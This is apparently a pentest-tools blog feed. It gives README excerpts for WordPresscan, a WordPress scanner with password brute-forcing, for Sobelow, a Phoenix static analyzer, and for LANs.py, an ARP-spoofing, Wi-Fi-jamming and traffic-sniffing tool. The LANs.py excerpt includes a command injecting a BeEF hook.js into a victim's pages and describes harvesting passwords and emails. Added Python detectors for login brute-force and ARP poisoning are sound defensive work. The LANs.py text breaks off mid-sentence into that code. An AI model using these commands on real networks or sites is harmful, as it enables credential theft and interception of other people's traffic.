WordPresscan – WPScan rewritten in Python + some WPSeku ideas

A simple WordPress scanner written in Python, based on the work of WPScan (Ruby version).

Install & Launch

Dependencies

pip install requests
pip install tornado

Install

git clone https://github.com/swisskyrepo/Wordpresscan.git
cd WordPresscan

Example 1 : Basic update and scan of a WordPress

python main.py -u "http://localhost/wordpress" --update --random-agent

-u : URL of the WordPress
--update : Update the wpscan database
--aggressive : Launch an aggressive version to scan for plugins/themes
--random-agent : Use a random user-agent for this session

Example 2 : Basic bruteforce (option --brute, option --nocheck)

python main.py -u "http://127.0.0.1/wordpress/" --brute fuzz/wordlist.lst
python main.py -u "http://127.0.0.1/wordpress/" --brute admin

--brute file.lst : Will bruteforce every username and their password
--brute username : Will bruteforce the password for the given username
It will also try to bruteforce the password for the detected users.

python main.py -u "http://127.0.0.1/wordpress/" --brute fuzz/wordlist.lst --nocheck

[ASCII-art banner: WordPress scanner based on wpscan work - @pentest_swissky]
[+] URL: http://127.0.0.1/wordpress/
[!] The WordPress 'http://127.0.0.1/wordpress/readme.html' file exposing a version number: 4.4.7
[i] Uploads directory has directory listing enabled : http://127.0.0.1/wordpress/wp-content/uploads/
[i] Includes directory has directory listing enabled : http://127.0.0.1/wordpress/wp-includes/
[i] Bruteforcing all users
[+] User found admin
[+] Starting passwords bruteforce for admin
Bruteforcing - ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░

Example 3 : Thinking is overrated, this is aggressive, mostly not advised!

python main.py -u "http://127.0.0.1/wordpress/" --fuzz

[i] Enumerating components from aggressive fuzzing ...
[i] File: http://127.0.0.1/wordpress/license.txt - found
[i] File: http://127.0.0.1/wordpress/readme.html - found
[i] File: http://127.0.0.1/wordpress/wp-admin/admin-footer.php - found
[i] File: http://127.0.0.1/wordpress/wp-admin/css/ - found
[i] File: http://127.0.0.1/wordpress/wp-admin/admin-ajax.php - found
[i] File: http://127.0.0.1/wordpress/wp-activate.php - found

--fuzz : Will fuzz the website in order to detect as many files, themes and plugins as possible

Credits and Contributors

Original idea and script from WPScan Team
Many PR and bugfixes from bl4de

Download WordPresscan
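The scan output above ends with WordPresscan guessing the admin password through wp-login.php. On the defender's side that activity shows up in the web server's access log as a burst of POST requests to wp-login.php (or xmlrpc.php) from one address, each answered with 200 because WordPress re-renders the login form on failure, while a successful login is answered with a 302 redirect. The script below is an added example, not part of WordPresscan: it parses constructed combined-format access log lines (addresses and timestamps are made up) and flags any source that exceeds a threshold of such POSTs inside a sliding time window. The log format, the threshold and the window length are assumptions to tune per site.

```python
"""Flag WordPress login brute-force bursts in web server access logs.

Added example (not WordPresscan code). Assumes the common "combined" access
log format; the log lines below are constructed, not real traffic.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample: 198.51.100.23 hammers wp-login.php and xmlrpc.php with
# several user-agents; 192.0.2.10 is a normal user who mistypes once and then
# logs in. WordPress answers a failed login with 200 (form re-rendered) and a
# successful one with a 302 redirect to wp-admin.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Oct/2023:13:54:50 +0000] "GET /wordpress/wp-login.php HTTP/1.1" 200 3051 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Oct/2023:13:55:01 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 2412 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Oct/2023:13:55:03 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 2412 "-" "curl/7.88"
192.0.2.10 - - [10/Oct/2023:13:55:04 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 2412 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Oct/2023:13:55:05 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 2412 "-" "Wget/1.21"
198.51.100.23 - - [10/Oct/2023:13:55:08 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 2412 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Oct/2023:13:55:12 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Oct/2023:13:55:14 +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Oct/2023:13:55:20 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 2412 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [timestamp] "METHOD path PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# Endpoints WordPress credential guessing goes through (xmlrpc.php accepts
# logins via the XML-RPC API).
LOGIN_PATHS = ("/wp-login.php", "/xmlrpc.php")


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m.group("ip"), "ts": ts, "method": m.group("method"),
            "path": m.group("path"), "status": int(m.group("status"))}


def detect_login_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return {ip: {"first", "last", "count"}} for sources with >= threshold
    failed login POSTs inside any window of window_seconds.

    The User-Agent is deliberately ignored: the --random-agent option rotates
    it, so it is not a stable key for counting.
    """
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)   # ip -> timestamps of failed login POSTs
    alerts = {}
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None or ev["method"] != "POST":
            continue
        if not ev["path"].split("?", 1)[0].endswith(LOGIN_PATHS):
            continue
        if ev["status"] != 200:   # 302 is a successful login, not a failed guess
            continue
        q = recent[ev["ip"]]
        q.append(ev["ts"])
        while q and ev["ts"] - q[0] > window:   # slide the window forward
            q.popleft()
        if len(q) >= threshold:
            alerts[ev["ip"]] = {"first": q[0], "last": ev["ts"], "count": len(q)}
    return alerts


if __name__ == "__main__":
    for ip, info in detect_login_bruteforce(SAMPLE_LOG).items():
        print(f"[!] {ip}: {info['count']} failed login POSTs between "
              f"{info['first'].time()} and {info['last'].time()}")
```

Run against the constructed sample, only 198.51.100.23 is reported; the legitimate user's single failed attempt followed by a 302 never reaches the threshold. Counting 200 responses rather than all POSTs is what keeps that user out of the report, and the same check works on xmlrpc.php, which the scanner's wordlist runs would otherwise slip past a wp-login.php-only rule.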

Link: http://feedproxy.google.com/~r/PentestTools/~3/G4YlZ6aUkBw/wordpresscan-wpscan-rewritten-in-python.html

Sobelow – Security-Focused Static Analysis for the Phoenix Framework

Sobelow is a security-focused static analysis tool for the Phoenix framework. For security researchers, it is a useful tool for getting a quick view of points-of-interest. For project maintainers, it can be used to prevent introducing a number of common vulnerabilities.

Currently Sobelow detects some types of the following security issues:

Insecure configuration
Known-vulnerable Dependencies
Cross-Site Scripting
SQL injection
Command injection
Denial of Service
Directory traversal
Unsafe serialization

Potential vulnerabilities are flagged in different colors according to confidence in their insecurity. High confidence is red, medium confidence is yellow, and low confidence is green.

A finding is typically marked "low confidence" if it looks like a function could be used insecurely, but it cannot reliably be determined if the function accepts user-supplied input. That is to say, green findings are not secure, they just require greater manual validation.

Note: This project is in constant development, and additional vulnerabilities will be flagged as time goes on. If you encounter a bug, or would like to request additional features or security checks, please open an issue!

Installation

To install Sobelow, you must have a working Elixir environment. Then, execute the following from the command line:

$ mix archive.install hex sobelow

You may also install directly from GitHub with the following command:

$ mix archive.install github nccgroup/sobelow

Use

The simplest way to scan a Phoenix project is to run the following from the project root:

$ mix sobelow

Options

--root -r : Specify application root directory
--with-code -v : Print vulnerable code snippets
--ignore -i : Ignore modules
--ignore-files : Ignore files
--details -d : Get module details
--all-details : Get all module details
--private : Skip update checks
--router : Specify router location
--exit : Return non-zero exit status
--format -f : Specify findings output format
--quiet : Return no output if there are no findings
--compact : Minimal, single-line findings

The root option takes a path argument:

$ mix sobelow --root ../my_project

The with-code option takes no arguments:

$ mix sobelow --with-code

The ignore option takes a comma-separated list of modules:

$ mix sobelow -i XSS.Raw,Traversal

The ignore-files option takes a comma-separated list of file names. File names should be absolute paths, or relative to the application root.

$ mix sobelow --ignore-files config/prod.exs

The details option takes a single module:

$ mix sobelow -d Config.CSRF

The exit option accepts a confidence threshold (low, medium, or high), and will return a non-zero exit status at or above that threshold.

$ mix sobelow --exit Low

The format option accepts an output format for findings. Current formats include txt (the default) and json.

Note: The json format option does not support the --with-code flag. All findings are organized by confidence level, and contain a "type" key. However, other keys may vary between finding types.

$ mix sobelow --format json

Configuration Files

Sobelow allows users to save frequently used options in a configuration file. For example, if you find yourself constantly running:

$ mix sobelow -i XSS.Raw,Traversal --with-code --exit Low

You can use the --save-config flag to create your .sobelow-conf config file:

$ mix sobelow -i XSS.Raw,Traversal --with-code --exit Low --save-config

This command will create the .sobelow-conf file at the root of your application. You can edit this file directly to make changes.

Now if you want to run Sobelow with the saved configuration, you can run Sobelow with the --config flag.

$ mix sobelow --config

False Positives

Sobelow favors over-reporting versus under-reporting. As such, you may find a number of false positives in a typical scan. These findings may be individually ignored by adding a # sobelow_skip comment, along with a list of modules, before the function definition.

# sobelow_skip ["Traversal"]
def vuln_func(…) do
  …
end

Then, run the scan with the --skip flag.

$ mix sobelow --skip

Config and Vulnerable Dependency findings cannot be skipped in this way. For these, use the standard ignore option.

Modules

Findings categories are broken up into modules. These modules can then be used to either ignore classes of findings (via the ignore and skip options) or to get vulnerability details (via the details option).

This list, and other helpful information, can be found on the command line:

$ mix help sobelow

Updates

When scanning a project, Sobelow will occasionally check for updates, and will print an alert if a new version is available. Sobelow keeps track of the last update-check by creating a .sobelow file in the root of the scanned project.

If this functionality is not desired, the --private flag can be used with the scan.

$ mix sobelow --private

Download Sobelow

Link: http://feedproxy.google.com/~r/PentestTools/~3/w1yDssiShnE/sobelow-security-focused-static.html

LANs.py – Inject Code, Jam Wifi, And Spy on Wifi Users

LANs.py

Automatically find the most active WLAN users, then spy on one of them and/or inject arbitrary HTML/JS into pages they visit. Individually poisons the ARP tables of the target box, the router and the DNS server if necessary. Does not poison anyone else on the network. Displays almost all the interesting bits of their traffic and can inject custom HTML into pages they visit. Cleans up after itself.

Also can be used to continuously jam nearby WiFi networks. This has an approximate range of a 1 block radius, but this can vary based on the strength of your WiFi card. This can be fine-tuned to allow jamming of everyone or even just one client. Cannot jam WiFi and spy simultaneously.

Prerequisites: Linux, python-scapy, python-nfqueue (nfqueue-bindings 0.4-3), aircrack-ng, python-twisted, BeEF (optional), nmap, nbtscan, tcpdump, and a wireless card capable of promiscuous mode if you don't know the IP of your target.

Tested on Kali. In the following examples 192.168.0.5 will be the attacking machine and 192.168.0.10 will be the victim.

All options:

python LANs.py [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC] [-d] [-v] [-dns DNSSPOOF] [-a] [-set] [-p] [-na] [-n] [-i INTERFACE] [-r REDIRECTTO] [-rip ROUTERIP] [-rmac ROUTERMAC] [-pcap PCAP] [-s SKIP] [-ch CHANNEL] [-m MAXIMUM] [-no] [-t TIMEINTERVAL] [--packets PACKETS] [--directedonly] [--accesspoint ACCESSPOINT]

Usage

Common usage:

python LANs.py -u -p

Active target identification which ARP spoofs the chosen target and outputs all the interesting non-HTTPS data they send or request. There's no -ip option, so this will ARP scan the network, compare it to a live running promiscuous capture, and list all the clients on the network. Attempts to tag the targets with a Windows NetBIOS name and prints how many data packets they are sending/receiving. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. Ctrl-C when you're ready and pick your target, which it will then ARP spoof.

Supports interception and harvesting of data from the following protocols: HTTP, FTP, IMAP, POP3, IRC. Will print the first 135 characters of URLs visited and ignore URLs ending in .jpg, .jpeg, .gif, .css, .ico, .js, .svg, and .woff. Will also print all protocol usernames/passwords entered, searches made on any site, emails sent/received, and IRC messages sent/received.

Screenshot: Running LANs.py without arguments will give you the list of active targets and, upon selecting one, it will act as a simple ARP spoofer.

Another common usage:

python LANs.py -u -p -d -ip 192.168.0.10

-d: open an xterm with driftnet to see all images they view
-ip: target this IP address and skip the active targeting at the beginning

HTML injection:

python LANs.py -b http://192.168.0.5:3000/hook.js

Inject a BeEF hook URL (http://beefproject.com/, tutorial: http://resources.infosecinstitute.com/beef-part-1/) into pages the victim visits. This just wraps the argument in
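The ARP poisoning LANs.py performs against the target, the router and the DNS server leaves a characteristic trace on the wire: one MAC address suddenly starts answering for IP addresses that other hosts were answering for a moment ago, and a single MAC ends up claiming several IPs at once. The snippet below is an added example, not part of LANs.py: it applies those two arpwatch-style checks to a constructed list of observed ARP replies. It reuses the README's addresses (192.168.0.5 as the attacking box, 192.168.0.10 as the victim) and assumes 192.168.0.1 is the router; the MAC addresses are made up. Reading real replies from a capture is left out so the example runs offline.

```python
"""Flag ARP cache poisoning from observed ARP replies (arpwatch-style checks).

Added example, not part of LANs.py. The observations are constructed:
(seconds, sender_ip, sender_mac) as they would be read from ARP replies.
"""
from collections import defaultdict

# Constructed observations using the README's addresses. 192.168.0.1 is assumed
# to be the router and 192.168.0.10 the client; after 30 s the box at
# 192.168.0.5 starts answering ARP for both of them. MAC addresses are made up.
OBSERVED_ARP_REPLIES = [
    (0, "192.168.0.1", "aa:bb:cc:00:00:01"),
    (1, "192.168.0.10", "aa:bb:cc:00:00:10"),
    (2, "192.168.0.5", "aa:bb:cc:00:00:05"),
    (30, "192.168.0.1", "AA:BB:CC:00:00:05"),
    (30, "192.168.0.10", "aa:bb:cc:00:00:05"),
    (32, "192.168.0.1", "aa:bb:cc:00:00:05"),
]


def detect_arp_spoofing(replies, baseline=None):
    """Return alerts for IP->MAC flips and for one MAC claiming several IPs.

    baseline: optional {ip: mac} of known-good pairs (typically the gateway),
    so a first sighting that disagrees with it is flagged instead of trusted.
    """
    ip_to_mac = {ip: mac.lower() for ip, mac in (baseline or {}).items()}
    ips_by_mac = defaultdict(set)
    for ip, mac in ip_to_mac.items():
        ips_by_mac[mac].add(ip)

    alerts = []
    for t, ip, mac in replies:
        mac = mac.lower()                      # normalise case before comparing
        known = ip_to_mac.get(ip)
        if known is not None and known != mac:
            # The IP was answered for by a different MAC before: classic
            # symptom of a poisoned entry (or, benignly, a DHCP reassignment).
            alerts.append({"t": t, "type": "ip_mac_change",
                           "ip": ip, "old": known, "new": mac})
        ip_to_mac[ip] = mac

        claimed = ips_by_mac[mac]
        newly_claimed = ip not in claimed
        claimed.add(ip)
        if newly_claimed and len(claimed) > 1:
            # One MAC now answers for more than one IP; a man-in-the-middle
            # box claims both the router and the victim this way.
            alerts.append({"t": t, "type": "mac_claims_many_ips",
                           "mac": mac, "ips": sorted(claimed)})
    return alerts


if __name__ == "__main__":
    gateway_baseline = {"192.168.0.1": "aa:bb:cc:00:00:01"}
    for a in detect_arp_spoofing(OBSERVED_ARP_REPLIES, baseline=gateway_baseline):
        detail = (f"{a['ip']} {a['old']} -> {a['new']}" if a["type"] == "ip_mac_change"
                  else f"{a['mac']} claims {', '.join(a['ips'])}")
        print(f"t={a['t']:>3}s  {a['type']:<20} {detail}")
```

On the constructed data the first alert is the router's IP flipping to 192.168.0.5's MAC at t=30, followed by that MAC claiming the victim as well; the repeat reply at t=32 raises nothing new. Both checks have benign triggers (DHCP lease changes, hosts with several addresses), so the gateway flip is the one to treat as high-priority and the rest as corroborating signal.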